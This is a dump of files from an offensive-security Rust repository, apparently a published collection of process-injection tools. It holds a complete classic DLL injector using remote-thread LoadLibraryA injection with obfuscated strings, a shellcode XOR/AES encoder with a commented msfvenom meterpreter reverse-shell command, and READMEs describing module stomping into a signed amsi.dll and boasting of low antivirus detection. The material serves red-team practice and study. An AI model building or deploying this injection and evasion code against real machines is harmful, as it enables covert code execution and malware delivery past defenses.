"2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [profile.release] 8 | opt-level = "z" # Optimize for size. 9 | lto = true # Enable Link Time Optimization 10 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 11 | panic = "abort" # Abort on panic 12 | strip = true # Automatically strip symbols from the binary. 13 | 14 | [dependencies] 15 | env_logger = "0.9.0" 16 | log = "0.4.17" 17 | #sysinfo = "0.20.4" 18 | obfstr = "0.3.0" 19 | #ntapi = "0.4.0" 20 | 21 | [dependencies.windows-sys] 22 | version = "0.42.0" 23 | features = [ 24 | "Win32_Foundation", 25 | "Win32_Security", 26 | "Win32_System_Threading", 27 | "Win32_UI_WindowsAndMessaging", 28 | "Win32_System_Memory", 29 | "Win32_System_Diagnostics_Debug", 30 | "Win32_System_SystemServices", 31 | "Win32_System_WindowsProgramming", 32 | "Win32_System_LibraryLoader", 33 | "Win32_NetworkManagement_IpHelper", 34 | "Win32_Networking_WinSock", 35 | "Win32_System_SystemInformation", 36 | "Win32_System_Environment", 37 | "Win32_System_ProcessStatus", 38 | "Win32_Globalization", 39 | "Win32_System_Diagnostics_ToolHelp", 40 | ] 41 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/dll_injector_classic-rs/inject/src/main.rs: -------------------------------------------------------------------------------- 1 | use obfstr::obfstr; 2 | use std::{env, mem::size_of, ptr::null_mut}; 3 | use windows_sys::Win32::{ 4 | Foundation::{CloseHandle, INVALID_HANDLE_VALUE}, 5 | System::{ 6 | Diagnostics::{ 7 | Debug::WriteProcessMemory, 8 | ToolHelp::{ 9 | CreateToolhelp32Snapshot, Process32First, Process32Next, PROCESSENTRY32, 10 | TH32CS_SNAPPROCESS, 11 | }, 12 | }, 13 | LibraryLoader::{GetModuleHandleA, GetProcAddress}, 14 | Memory::{VirtualAllocEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}, 15 | Threading::{CreateRemoteThread, OpenProcess, PROCESS_ALL_ACCESS}, 16 | }, 17 | }; 18 | 19 | fn main() { 20 | env_logger::init(); 21 | 22 | let args: Vec = env::args().collect(); 23 | 24 | if args.len() < 3 { 25 | println!("Usage: inject.exe "); 26 | std::process::exit(1); 27 | } 28 | 29 | let process_name = &args[1]; 30 | let file_path = &args[2]; 31 | 32 | log::info!("Process: {}", process_name); 33 | log::info!("Path: {}", file_path); 34 | 35 | let process_id = 36 | get_process_id_by_name(process_name).expect(obfstr!("Failed to get process ID")); 37 | 38 | log::info!("Process ID: {}", process_id); 39 | 40 | let hprocess = unsafe { OpenProcess(PROCESS_ALL_ACCESS, 0, process_id) }; 41 | 42 | if hprocess == 0 { 43 | panic!("{}", obfstr!("[-] Error: failed to open process")); 44 | } 45 | 46 | let allocated_memory = unsafe { 47 | VirtualAllocEx( 48 | hprocess, 49 | null_mut(), 50 | file_path.len(), 51 | MEM_COMMIT | MEM_RESERVE, 52 | PAGE_EXECUTE_READWRITE, 53 | ) 54 | }; 55 | 56 | log::info!("Allocated Memory: {:p}", allocated_memory); 57 | 58 | if allocated_memory.is_null() { 59 | panic!("{}", obfstr!("[-] Error: failed to allocate memory in the process")); 60 | } 61 | 62 | let mut tmp = 0; 63 | let wpm_result = unsafe { 64 | WriteProcessMemory( 65 | hprocess, 66 | allocated_memory, 67 | file_path.as_ptr() as _, 68 | file_path.len(), 69 | &mut tmp, 70 | ) 71 | }; 72 | 73 | if wpm_result == 0 { 74 | panic!("{}", obfstr!("[-] Error: failed to write to process memory")); 75 | } 76 | 77 | let k32_address = unsafe { GetModuleHandleA(obfstr!("KERNEL32.DLL\0").as_ptr()) }; 78 | 79 | if k32_address == 0 { 80 | panic!("{}", obfstr!("[-] Error: failed to get module handle")); 81 | } 82 | 83 | log::info!("Kernel32 Address: {:#x}", k32_address); 84 | 85 | let loadlib_address = unsafe { 86 | GetProcAddress(k32_address, obfstr!("LoadLibraryA\0").as_ptr()) 87 | .expect(obfstr!("Failed to get LoadLibraryA address")) 88 | }; 89 | 90 | log::info!("LoadLibraryA address: {:#x}", loadlib_address as usize); 91 | 92 | let mut tmp = 0; 93 | let hthread = unsafe { 94 | CreateRemoteThread( 95 | hprocess, 96 | null_mut(), 97 | 0, 98 | Some(std::mem::transmute(loadlib_address as usize)), 99 | allocated_memory, 100 | 0, 101 | &mut tmp, 102 | ) 103 | }; 104 | 105 | if hthread == 0 { 106 | panic!("{}", obfstr!("[-] Error: failed to create remote thread")); 107 | } 108 | 109 | unsafe { CloseHandle(hthread) }; 110 | unsafe { CloseHandle(hprocess) }; 111 | 112 | log::info!("Injection Complete!"); 113 | } 114 | 115 | /// Gets the process ID by name, take process name as a parameter 116 | fn get_process_id_by_name(process_name: &str) -> Result { 117 | let h_snapshot = unsafe { CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) }; 118 | 119 | if h_snapshot == INVALID_HANDLE_VALUE { 120 | return Err(obfstr!("Failed to call CreateToolhelp32Snapshot").to_owned()); 121 | } 122 | 123 | let mut process_entry: PROCESSENTRY32 = unsafe { std::mem::zeroed::() }; 124 | process_entry.dwSize = size_of::() as u32; 125 | 126 | if unsafe { Process32First(h_snapshot, &mut process_entry) } == 0 { 127 | return Err(obfstr!("Failed to call Process32First").to_owned()); 128 | } 129 | 130 | loop { 131 | if convert_c_array_to_rust_string(process_entry.szExeFile.to_vec()).to_lowercase() 132 | == process_name.to_lowercase() 133 | { 134 | break; 135 | } 136 | 137 | if unsafe { Process32Next(h_snapshot, &mut process_entry) } == 0 { 138 | return Err(obfstr!("Failed to call Process32Next").to_owned()); 139 | } 140 | } 141 | 142 | return Ok(process_entry.th32ProcessID); 143 | } 144 | 145 | /// Converts a C null terminated String to a Rust String 146 | pub fn convert_c_array_to_rust_string(buffer: Vec) -> String { 147 | let mut rust_string: Vec = Vec::new(); 148 | for char in buffer { 149 | if char == 0 { 150 | break; 151 | } 152 | rust_string.push(char as _); 153 | } 154 | String::from_utf8(rust_string).unwrap() 155 | } -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/dll_injector_classic-rs/injected.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/arsenal-rs/dll_injector_classic-rs/injected.png -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/dll_injector_classic-rs/testdll/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "testdll" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [lib] 8 | crate-type = ["cdylib"] 9 | 10 | [profile.release] 11 | opt-level = "z" # Optimize for size. 12 | lto = true # Enable Link Time Optimization 13 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 14 | panic = "abort" # Abort on panic 15 | strip = true # Automatically strip symbols from the binary. 16 | 17 | [dependencies.windows-sys] 18 | version = "0.42.0" 19 | features = [ 20 | "Win32_Foundation", 21 | "Win32_Security", 22 | "Win32_System_Threading", 23 | "Win32_UI_WindowsAndMessaging", 24 | "Win32_System_Memory", 25 | "Win32_System_Diagnostics_Debug", 26 | "Win32_System_SystemServices", 27 | "Win32_System_WindowsProgramming", 28 | "Win32_System_LibraryLoader", 29 | "Win32_NetworkManagement_IpHelper", 30 | "Win32_Networking_WinSock", 31 | "Win32_System_SystemInformation", 32 | "Win32_System_Environment", 33 | "Win32_System_ProcessStatus", 34 | "Win32_Globalization", 35 | "Win32_System_Diagnostics_ToolHelp", 36 | ] -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/dll_injector_classic-rs/testdll/src/lib.rs: -------------------------------------------------------------------------------- 1 | use std::ffi::c_void; 2 | use windows_sys::Win32::{ 3 | Foundation::{BOOL, HINSTANCE}, 4 | System::SystemServices::DLL_PROCESS_ATTACH, 5 | UI::WindowsAndMessaging::MessageBoxA, 6 | }; 7 | 8 | #[no_mangle] 9 | #[allow(non_snake_case)] 10 | pub unsafe extern "system" fn DllMain( 11 | _module: HINSTANCE, 12 | call_reason: u32, 13 | _reserved: *mut c_void, 14 | ) -> BOOL { 15 | if call_reason == DLL_PROCESS_ATTACH { 16 | MessageBoxA( 17 | 0 as _, 18 | "Rust DLL injected!\0".as_ptr() as _, 19 | "Rust DLL\0".as_ptr() as _, 20 | 0x0, 21 | ); 22 | 23 | 1 24 | } else { 25 | 1 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/module_stomping-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | debug/ 4 | target/ 5 | 6 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 7 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 8 | Cargo.lock 9 | 10 | # These are backup files generated by rustfmt 11 | **/*.rs.bk 12 | 13 | # MSVC Windows builds of rustc generate these, which store debugging information 14 | *.pdb 15 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/module_stomping-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "module_stomping-rs" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [profile.release] 8 | opt-level = "z" # Optimize for size. 9 | lto = true # Enable Link Time Optimization 10 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 11 | panic = "abort" # Abort on panic 12 | strip = true # Automatically strip symbols from the binary. 13 | 14 | [dependencies] 15 | env_logger = "0.9.0" 16 | log = "0.4.17" 17 | #sysinfo = "0.20.4" 18 | obfstr = "0.3.0" 19 | #ntapi = "0.4.0" 20 | 21 | [dependencies.windows-sys] 22 | version = "0.42.0" 23 | features = [ 24 | "Win32_Foundation", 25 | "Win32_Security", 26 | "Win32_System_Threading", 27 | "Win32_UI_WindowsAndMessaging", 28 | "Win32_System_Memory", 29 | "Win32_System_Diagnostics_Debug", 30 | "Win32_System_SystemServices", 31 | "Win32_System_WindowsProgramming", 32 | "Win32_System_LibraryLoader", 33 | "Win32_NetworkManagement_IpHelper", 34 | "Win32_Networking_WinSock", 35 | "Win32_System_SystemInformation", 36 | "Win32_System_Environment", 37 | "Win32_System_ProcessStatus", 38 | "Win32_Globalization", 39 | "Win32_System_Diagnostics_ToolHelp", 40 | ] -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/module_stomping-rs/README.md: -------------------------------------------------------------------------------- 1 | # Module Stomping / Module Overloading / DLL Hollowing 2 | 3 | A basic/simple PoC in Rust made for fun, practice, and learning. Check out my Manual Mapper in Rust: https://github.com/memN0ps/mmapper-rs or Shellcode Reflective DLL Injection in Rust: https://github.com/memN0ps/srdi-rs for alternatives. 4 | 5 | ## Description 6 | 7 | Module stomping injects a Microsoft-signed DLL (e.g amsi.dll) using a classic DLL Injection technique that uses as shown here: [Classic DLL Injection in Rust](https://github.com/memN0ps/arsenal-rs/tree/main/dll_injector_classic-rs). It will then read the `AddressOfEntryPoint` of the injected DLL from the target process and overwrite the content with shellcode. 8 | 9 | In this example we use the following steps to perfrom a classic DLL Injection of `amsi.dll` inside `notepad.exe` and then inject our shellcode inside `amsi.dll's` entry point: 10 | 11 | * `OpenProcess` - Open a handle to the target process with `PROCESS_ALL_ACCESS` 12 | * `VirtualAllocEx` - Allocate memory for `amsi.dll` full path 13 | * `WriteProcessMemory` - Write the DLL path to the target process memory 14 | * `GetModuleHandleA` - Get a handle to `kernel32.dll` 15 | * `GetProcAddress` - Get the address of `LoadLibraryA` 16 | * `CreateRemoteThread` - Create a thread in the target process 17 | 18 | We can now inject our shellcode into the target process 19 | 20 | * Get the module (amsi.dll) base address from the target process (notepad.exe) that we just injected 21 | * `ReadProcessMemory` - To read the the DOS and NT headers to get the `AddressOfEntryPoint` of `asmi.dll` in the target process (notepad.exe) 22 | * `WriteProcessMemory` - To overwrite the `AddressOfEntryPoint` content with our shellcode 23 | * `CreateRemoteThread`- Create a thread to run the contents of our shellcode inside `amsi.dll` that is inside `notepad.exe` in this example. 24 | 25 | Microsoft Signed DLL 26 | ``` 27 | PS C:\Users\memn0ps\Documents\GitHub\arsenal-rs\module_stomping-rs\target\release> sigcheck C:\Windows\System32\amsi.dll 28 | 29 | Sigcheck v2.90 - File version and signature viewer 30 | Copyright (C) 2004-2022 Mark Russinovich 31 | Sysinternals - www.sysinternals.com 32 | 33 | c:\windows\system32\amsi.dll: 34 | Verified: Signed 35 | Signing date: 1:41 PM 9/11/2022 36 | Publisher: Microsoft Windows 37 | Company: Microsoft Corporation 38 | Description: Anti-Malware Scan Interface 39 | Product: Microsoft« Windows« Operating System 40 | Prod version: 10.0.19041.2075 41 | File version: 10.0.19041.2075 (WinBuild.160101.0800) 42 | MachineType: 64-bit 43 | ``` 44 | 45 | Process Monitor's Load Image event shows that `amsi.dll` was loaded. 46 | 47 | ![Process Monitor](./procmon.png) 48 | 49 | Process Explorer shows that `amsi.dll` was loaded too and we can see that our shellcode was executed from the `MessageBoxA` pop-up, which was generated by `msfvenom -p windows/x64/messagebox -f rust` 50 | 51 | ![Process Monitor](./injection.png) 52 | 53 | We can look at `notepad.exe` threads that are running, which shows that thread `9616` with the start address of `Amsi!AmsiUacScan+0xabe0`. 54 | 55 | ![Process Monitor](./thread.png) 56 | 57 | 58 | We can inspect this memory location in more detail with `Windbg`. The memory location resolves to `Amsi!DLLMainCRTStartup` and the bytes located in this memory location contains our shellcode. 59 | 60 | ![Process Monitor](./windbg.png) 61 | 62 | ## Usage 63 | 64 | ``` 65 | .\module_stomping-rs.exe 66 | ``` 67 | 68 | ## Example 69 | 70 | Build 71 | 72 | ``` 73 | cargo build --release 74 | ``` 75 | 76 | Enable logging for debugging 77 | 78 | ``` 79 | $env:RUST_LOG="debug" 80 | ``` 81 | 82 | Inject amsi.dll 83 | ``` 84 | PS C:\Users\memn0ps\Documents\GitHub\arsenal-rs\module_stomping-rs\target\release> .\module_stomping-rs.exe notepad.exe C:\Windows\System32\amsi.dll amsi.dll 85 | 86 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] Process: notepad.exe 87 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] Path: C:\Windows\System32\amsi.dll 88 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] Allocated Memory: 0x202d42c0000 89 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] Kernel32 Address: 0x7ffa6a510000 90 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] LoadLibraryA address: 0x7ffa6a5304f0 91 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] C:\Windows\System32\amsi.dll DLL Injection Complete! 92 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] Module Base: 0x7ffa5a6d0000 93 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] Remote Buffer Length: 0x148 94 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] Bytes Read: 328 95 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] IMAGE_DOS_HEADER: 0x000002a5c4144b30 96 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] IMAGE_NT_HEADERS: 0x000002a5c4144c30 97 | [2022-11-07T23:12:34Z INFO module_stomping_rs] [+] AddressOfEntryPoint: 0x7ffa5a6de820 98 | PS C:\Users\memn0ps\Documents\GitHub\arsenal-rs\module_stomping-rs\target\release> 99 | ``` 100 | 101 | ## Note 102 | 103 | A more advanced version of this can be found here https://github.com/boku7/Ninja_UUID_Runner by Bobby Cooke ([@0xBoku](https://twitter.com/0xBoku)), which mixes up different process injection techniques for evasion. 104 | 105 | 106 | ## References and Credits 107 | 108 | * https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection 109 | * https://thewover.github.io/Dynamic-Invoke/ 110 | * https://github.com/hasherezade/module_overloading 111 | * https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing 112 | * https://williamknowles.io/living-dangerously-with-module-stomping-leveraging-code-coverage-analysis-for-injecting-into-legitimately-loaded-dlls/ 113 | * https://github.com/boku7/Ninja_UUID_Runner 114 | * https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/ -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/module_stomping-rs/injection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/arsenal-rs/module_stomping-rs/injection.png -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/module_stomping-rs/procmon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/arsenal-rs/module_stomping-rs/procmon.png -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/module_stomping-rs/thread.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/arsenal-rs/module_stomping-rs/thread.png -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/module_stomping-rs/windbg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/arsenal-rs/module_stomping-rs/windbg.png -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/obfuscate_shellcode-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk 11 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/obfuscate_shellcode-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "obfuscate_shellcode-rs" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libaes = "0.6.1" 10 | itertools = "0.10.3" 11 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/obfuscate_shellcode-rs/src/main.rs: -------------------------------------------------------------------------------- 1 | use libaes::Cipher; 2 | use itertools::Itertools; 3 | 4 | fn main() { 5 | //msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 -f csharp 6 | let shellcode: Vec = vec![0x90, 0x90, 0x90]; 7 | 8 | 9 | //change keys 10 | let xor_shellcode: Vec = xor_encode(&shellcode, 0xDA); 11 | let aes_shellcode: Vec= aes_256_encrypt(&shellcode, b"ABCDEFGHIJKLMNOPQRSTUVWXYZ-01337", b"This is 16 bytes"); 12 | 13 | println!("XOR Shellcode: {:#x}", xor_shellcode.iter().format(", ")); 14 | println!(); 15 | println!(); 16 | println!("AES Shellcode: {:#x}", aes_shellcode.iter().format(", ")); 17 | } 18 | 19 | fn xor_encode(shellcode: &Vec, key: u8) -> Vec { 20 | shellcode.iter().map(|x| x ^ key).collect() 21 | } 22 | 23 | fn aes_256_encrypt(shellcode: &Vec, key: &[u8; 32], iv: &[u8; 16]) -> Vec { 24 | // Create a new 128-bit cipher 25 | let cipher = Cipher::new_256(key); 26 | 27 | // Encryption 28 | let encrypted = cipher.cbc_encrypt(iv, shellcode); 29 | 30 | encrypted 31 | } -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/process_hollowing-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk 11 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/process_hollowing-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "process_hollowing-rs" 3 | version = "0.1.0" 4 | edition = "2021" 5 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 6 | 7 | [dependencies] 8 | ntapi = { version = "0.3.7", features = ["impl-default"]} 9 | winapi = { version = "0.3.9", features = ["processthreadsapi", "memoryapi", "winbase", "impl-default", "errhandlingapi"] } 10 | libaes = "0.6.1" 11 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/process_hollowing-rs/README.md: -------------------------------------------------------------------------------- 1 | # Process Hollowing 2 | 3 | ## Detections 4 | 5 | I had 1 detection on Virus Total but this will change after making the project public, also don't rely 100% on virus total results. 6 | 7 | https://www.virustotal.com/gui/file/054783446c4e72a1d46b4cca5f57128ad55ebde1511dbdd5f40be6d497644193?nocache=1 8 | 9 | ![Detection](./detection.png) 10 | 11 | ## References 12 | 13 | * https://github.com/kmanc/remote_code_oxidation 14 | * https://theevilbit.blogspot.com/2018/08/about-writeprocessmemory.html 15 | * https://github.com/snovvcrash/DInjector/ 16 | * https://docs.rs/winapi/latest/winapi/index.html 17 | * https://docs.rs/ntapi/latest/ntapi/index.html 18 | * https://twitter.com/MrUn1k0d3r (MrUn1k0d3r's Discord) 19 | * https://twitter.com/rustlang (Rust Community's Discord) 20 | * https://github.com/trickster0/OffensiveRust 21 | * https://docs.rs/libaes/latest/libaes/ -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/process_hollowing-rs/detection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/arsenal-rs/process_hollowing-rs/detection.png -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/rdi-rs/.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/rdi-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | debug/ 4 | target/ 5 | 6 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 7 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 8 | Cargo.lock 9 | 10 | # These are backup files generated by rustfmt 11 | **/*.rs.bk 12 | 13 | # MSVC Windows builds of rustc generate these, which store debugging information 14 | *.pdb 15 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/rdi-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/rdi-rs/README.md: -------------------------------------------------------------------------------- 1 | # Reflective DLL Injection (RDI) 2 | 3 | Check out Shellcode Reflective DLL Injection (sRDI) here: 4 | * https://github.com/memN0ps/srdi-rs 5 | 6 | ## References and Credits 7 | 8 | * https://github.com/stephenfewer/ReflectiveDLLInjection/ 9 | * https://discord.com/invite/rust-lang-community (Rust Community #windows-dev channel) 10 | * https://github.com/dismantl/ImprovedReflectiveDLLInjection 11 | * https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html 12 | * https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/ 13 | * https://github.com/Cracked5pider/KaynLdr 14 | * https://github.com/monoxgas/sRDI 15 | * https://github.com/Ben-Lichtman/reloader/ 16 | * https://github.com/not-matthias/mmap/ 17 | * https://github.com/memN0ps/mmapper-rs 18 | * https://github.com/2vg/blackcat-rs/tree/master/crate/mini-sRDI 19 | * https://github.com/Jaxii/idk-rs/ 20 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/rdi-rs/inject/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "inject" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | sysinfo = "0.20.4" 10 | log = "0.4.17" 11 | env_logger = "0.9.0" 12 | 13 | [dependencies.windows-sys] 14 | version = "0.36.1" 15 | features = [ 16 | "Win32_Foundation", 17 | "Win32_Security", 18 | "Win32_System_Threading", 19 | "Win32_UI_WindowsAndMessaging", 20 | "Win32_System_Memory", 21 | "Win32_System_Diagnostics_Debug", 22 | "Win32_System_SystemServices" 23 | ] -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/rdi-rs/reflective_loader/.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/rdi-rs/reflective_loader/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "reflective_loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [profile.release] 8 | strip = true # Automatically strip symbols from the binary. 9 | opt-level = "z" # Optimize for size. 10 | lto = true 11 | codegen-units = 1 12 | panic = "abort" 13 | 14 | [lib] 15 | crate-type = ["cdylib"] 16 | 17 | [dependencies] 18 | winapi = { version = "0.3.9", features = ["processthreadsapi", "memoryapi", "winbase", "impl-default", "errhandlingapi", "handleapi", "winuser", "heapapi", "impl-default"] } 19 | ntapi = "0.3.7" 20 | wchar = "0.11.0" 21 | log = "0.4.17" 22 | env_logger = "0.9.0" 23 | obfstr = "0.3.0" 24 | utf16_literal = "0.2.1" 25 | 26 | [dependencies.num-traits] 27 | version = "0.2.15" 28 | default-features = false -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/rdi-rs/reflective_loader/src/lib.rs: -------------------------------------------------------------------------------- 1 | mod loader; 2 | 3 | use winapi::shared::minwindef::{BOOL, DWORD, HINSTANCE, LPVOID, TRUE}; 4 | use winapi::um::memoryapi::VirtualFree; 5 | use winapi::um::winnt::{DLL_PROCESS_ATTACH, MEM_RELEASE}; 6 | use winapi::um::winuser::MessageBoxA; 7 | 8 | #[no_mangle] 9 | #[allow(non_snake_case)] 10 | pub unsafe extern "system" fn DllMain( 11 | _module: HINSTANCE, 12 | call_reason: DWORD, 13 | _reserved: LPVOID, 14 | ) -> BOOL { 15 | if call_reason == DLL_PROCESS_ATTACH { 16 | // Cleanup RWX region (thread) 17 | VirtualFree(_reserved, 0, MEM_RELEASE); 18 | MessageBoxA( 19 | 0 as _, 20 | "Rust DLL injected!\0".as_ptr() as _, 21 | "Rust DLL\0".as_ptr() as _, 22 | 0x0, 23 | ); 24 | 25 | TRUE 26 | } else { 27 | TRUE 28 | } 29 | } -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/shellcode_runner_classic-rs/.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/shellcode_runner_classic-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk 11 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/shellcode_runner_classic-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode_runner_classic-rs" 3 | version = "0.1.0" 4 | edition = "2018" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | sysinfo = "0.20.4" 10 | ntapi = "0.3.6" 11 | winapi = { version = "0.3.8", features = ["ntdef", "ntstatus", "impl-default", "basetsd"] } 12 | libaes = "0.6.1" 13 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/shellcode_runner_classic-rs/Detections.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/arsenal-rs/shellcode_runner_classic-rs/Detections.PNG -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/shellcode_runner_classic-rs/PoC.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/arsenal-rs/shellcode_runner_classic-rs/PoC.PNG -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/shellcode_runner_classic-rs/README.md: 